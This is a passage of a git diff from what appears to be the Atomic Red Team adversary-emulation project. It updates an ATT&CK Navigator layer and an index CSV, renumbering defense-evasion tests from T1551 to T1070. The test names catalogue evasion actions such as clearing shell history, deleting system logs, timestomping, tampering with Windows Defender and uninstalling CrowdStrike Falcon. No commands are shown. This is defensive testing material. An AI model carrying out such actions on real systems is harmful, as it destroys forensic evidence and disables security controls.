led":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,
"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T
1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1546.015","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1551.001","score":100,"enabled":true},{"techniqueID":"T1551.002","score":100,"enabled":true},{"techniqueID":"T1551.003","score":100,"enabled":true},{"techniqueID":"T1551.004","score":100,"enabled":
true},{"techniqueID":"T1551.005","score":100,"enabled":true},{"techniqueID":"T1551.006","score":100,"enabled":true},{"techniqueID":"T1551","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.010","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1
053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T11
10.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{
"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1546.015","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true
},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.010","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index ae8fcb15..05831798 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -213,18 +213,18 @@ defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Tru
defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
-defense-evasion,T1551.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
-defense-evasion,T1551.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
-defense-evasion,T1551.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
-defense-evasion,T1551.003,Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
-defense-evasion,T1551.003,Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
-defense-evasion,T1551.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
-defense-evasion,T1551.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
-defense-evasion,T1551.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
-defense-evasion,T1551.002,Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
-defense-evasion,T1551.002,Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
-defense-evasion,T1551.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
-defense-evasion,T1551.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
+defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
+defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
+defense-evasion,T1070.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
+defense-evasion,T1070.003,Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
+defense-evasion,T1070.003,Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
+defense-evasion,T1070.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
+defense-evasion,T1070.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
+defense-evasion,T1070.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
+defense-evasion,T1070.002,Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
+defense-evasion,T1070.002,Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
+defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
+defense-evasion,T1070.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
@@ -262,16 +262,16 @@ defense-evasion,T1562.001,Disable or Modify Tools,20,Uninstall Crowdstrike Falco
defense-evasion,T1562.001,Disable or Modify Tools,21,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
-defense-evasion,T1551.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
-defense-evasion,T1551.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
-defense-evasion,T1551.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
-defense-evasion,T1551.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
-defense-evasion,T1551.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
-defense-evasion,T1551.004,File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
-defense-evasion,T1551.004,File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
-defense-evasion,T1551.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
-defense-evasion,T1551.004,File Deletion,9,Delete-PrefetchFile,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
-defense-evasion,T1551.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
+defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
+defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
+defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
+defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
+defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
+defense-evasion,T1070.004,File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
+defense-evasion,T1070.004,File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
+defense-evasion,T1070.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
+defense-evasion,T1070.004,File Deletion,9,Delete-PrefetchFile,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
+defense-evasion,T1070.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
defense-evasion,T1553.001,Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
@@ -284,7 +284,7 @@ defense-evasion,T1564.001,Hidden Files and Directories,6,Hide a Directory,b115ec
defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
defense-evasion,T1564.002,Hidden Users,1,Hidden Users,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
-defense-evasion,T1551,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
+defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
@@ -326,9 +326,9 @@ defense-evasion,T1564.004,NTFS File Attributes,1,Alternate Data Streams (ADS),88
defense-evasion,T1564.004,NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,4,Create ADS PowerShell,0045ea16-ed3c-4d4c-a9ee-15e44d1560d1,powershell
-defense-evasion,T1551.005,Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
-defense-evasion,T1551.005,Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
-defense-evasion,T1551.005,Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
+defense-evasion,T1070.005,Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
+defense-evasion,T1070.005,Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
+defense-evasion,T1070.005,Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
@@ -387,14 +387,14 @@ defense-evasion,T1036.006,Space after Filename,1,Space After Filename,89a7dd26-e
defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
-defense-evasion,T1551.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
-defense-evasion,T1551.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
-defense-evasion,T1551.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
-defense-evasion,T1551.006,Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
-defense-evasion,T1551.006,Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
-defense-evasion,T1551.006,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
-defense-evasion,T1551.006,Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
-defense-evasion,T1551.006,Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
+defense-evasion,T1070.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
+defense-evasion,T1070.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
+defense-evasion,T1070.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
+defense-evasion,T1070.006,Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
+defense-evasion,T1070.006,Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
+defense-evasion,T1070.006,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
+defense-evasion,T1070.006,Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
